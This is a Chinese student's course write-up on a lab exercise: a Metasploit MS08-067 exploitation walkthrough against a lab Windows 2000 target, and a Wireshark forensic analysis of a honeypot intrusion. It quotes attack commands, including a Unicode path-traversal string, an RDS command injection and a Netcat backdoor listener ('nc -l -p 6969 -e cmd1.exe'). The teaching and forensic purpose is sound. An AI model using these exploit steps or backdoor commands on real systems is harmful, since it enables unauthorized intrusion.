20251904 2025-2026-2 《网络攻防实践》第六周作业

2025-2026-2 《网络攻防实践》第六周作业

1.实践内容

1.1实践内容

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

1.2知识点梳理与总结

一、MS08-067漏洞与Metasploit框架

MS08-067是Windows Server服务的远程代码执行漏洞,攻击者可构造恶意RPC请求触发缓冲区溢出。Metasploit框架通过search定位漏洞模块,设置RHOST(靶机IP)、LHOST(本机IP)和payload(攻击载荷)后执行exploit即可获取Shell。反向连接载荷reverse_tcp能穿透防火墙,适用于靶机在NAT后的场景。

二、Unicode路径遍历漏洞

IIS服务器对Unicode编码的路径分隔符处理不当,攻击者可用..%c0af..(/的Unicode编码)绕过路径限制访问敏感文件如boot.ini。这是典型的输入验证缺失漏洞,防护措施包括及时打补丁和删除不必要的虚拟目录。

三、RDS漏洞与Netcat后门

msadcs.dll中的远程数据服务存在命令注入漏洞,攻击者可执行任意系统命令。实验中攻击者利用msadc(2).pl工具植入Netcat后门(nc -l -p 6969 -e cmd1.exe),实现远程持久化控制。特征字符串ADM!ROX!YOUR!WORLD!可用于攻击识别。

四、Wireshark取证分析

通过过滤器ip.addr定位攻击源,http筛选Web攻击,tcp.stream eq n追踪完整TCP会话。分析时重点关注:异常端口连接、路径遍历特征、命令注入痕迹,最终还原攻击时间线。实验表明攻击者执行了提权、文件删除、嗅探等操作,并识别出蜜罐环境。

2.实践过程

2.1通过Metasploit平台调用MS08-067漏洞利用模块,对Windows靶机实施远程渗透测试。

kali命令行输入msfconsole,启动msfconsole如下:
image
查找要使用的漏洞对应的模块,输入指令search ms08_067,可以看到对应编号是0。
image
输入use 0继续使用该模块,键入info即可查看靶机适用范围
image
使用show options查看攻击漏洞需要的设置
image
输入指令show payloads查看可用荷载
image
输入set payload generic/shell_reverse_tcp 设置载荷
image
输入set RHOST 192.168.200.6 设置要攻击的主机(win2k)
image
输入set LHOST 192.168.200.3设置本机(kali)
image
输入exploit进行攻击
image
输入ipconfig可以发现已经成功攻击
image

2.2 取证分析实践:解码一次成功的NT系统破解攻击

(1)攻击者使用了什么破解工具进行攻击

使用wireshark打开从学习通下载的log文件
image
看到攻击机与目标主机在TCP“三次握手”后建立了连接,发现攻击机经三次握手。输入ip.addr ==172.16.1.106 and http,筛选有用信息进行分析。
image
注意到编号117,其中这个boot.ini是NT系统的启动文件。而前面的..%c0af..查阅资料后得知,这是"/"的Unicode编码,基本确定存在Unicode漏洞攻击。

(2)攻击者如何使用这个破解工具进入并控制了系统?

注意140行:有一个msadcs.dll文件,这是一个远程数据访问服务的文件,存在RDS漏洞,该漏洞可以导致攻击者远程执行用户系统的命令,并以设备用户的身份运行
image
筛选tcp.stream eq 11进行HTTP流追踪,发现特征字符串 ADM!ROX!YOUR!WORLD!,经查证该行为与 RDS 漏洞攻击有关。攻击者利用 msadcs.dll 中存在的 RDS 安全漏洞发起 SQL 注入攻击,并进一步执行命令 cmd /c echo werd >> c:\fun。其中,ADM!ROX!YOUR!WORLD! 这一特征字符串多次出现。结合公开资料分析,可判断此次攻击大概率是通过 msadc(2).pl 渗透工具发起的。
image
筛选tcp.stream eq 123,攻击者执行了这样一条命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限
image

(3)当攻击者获得系统的访问权后做了什么?

筛选tcp.port==6969,追踪tcp流可以看到攻击者的行为如下图
image
查询过程中可以看到下图的ADD提权
image
攻击者删除了一些文件,并且进行了嗅探
image
image
并且发现了这是实验服务器
image
tcp.stream eq 178
image
发现攻击者写到这是他见过的最好的蜜罐((5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?)

(4)我们如何防止这样的攻击

1.为这些漏洞打上补丁.
2.自身的口令设置为强口令,提高破解口令的难度;
3.若没必要使用SCRIPTS和MSADC目录,删除或改名;

(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

请看(3)中最后一部分

2.3 团队对抗实践:windows系统远程渗透攻击和分析

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
首先打开wireshark
image
攻击机kali ip地址:192.168.200.9(孙晨曦)
image
靶机Win2k ip地址: 192.168.200.6 (王熙)
按照任务一步骤,攻击靶机192.168.200.6 (王熙)
可以看到已经成功获取访问权
image
键入如下图命令
image
在靶机中可以看到,文件创建成功, 并且内容正确
image
分析其在攻击时wireshark的抓包,追踪其tcp流可以看到对靶机的所有命令。(因为前面我忘了打开wireshark,下面是重新做的,所以命令和上文的略有区别)
image

3.学习中遇到的问题及解决

  • 问题1:通过Metasploit平台调用MS08-067漏洞利用模块时,输入use 0 后键入 info 0无法查看靶机使用范围
    image
  • 问题1解决方案:将命令改为info
  • 问题2:虚拟机kali打开fireworks浏览器之后无法正常打开界面以下载学习通中log文件
  • 问题2解决方案:卸载重新安装

4.实践总结

这次实验让我对漏洞利用、流量分析和攻防对抗有了更直观的认识。前面使用 Metasploit 调用 MS08-067 漏洞模块攻击 Windows 靶机时,我按照步骤完成了模块搜索、参数设置和 payload 配置,最后成功拿到靶机权限,过程还是挺有成就感的,也让我真正理解了漏洞利用是需要一步步配置完成。后面在取证分析部分,我用 Wireshark 对日志和抓包数据进行了筛选和追踪,通过分析关键的数据流,逐渐还原了攻击者入侵、建立后门和执行命令的过程,这让我感受到流量分析在安全取证中的重要性。实验中虽然也遇到了命令输入错误、环境配置异常这些问题,但在排查后都顺利解决了。总体来说,这次实验不仅提高了我的实际操作能力,也让我对网络攻击原理和安全防护措施有了更深的理解。

参考资料

  • 《网络攻防技术与实践》
posted @ 2026-04-27 14:39  scx28  阅读(35)  评论(0)    收藏  举报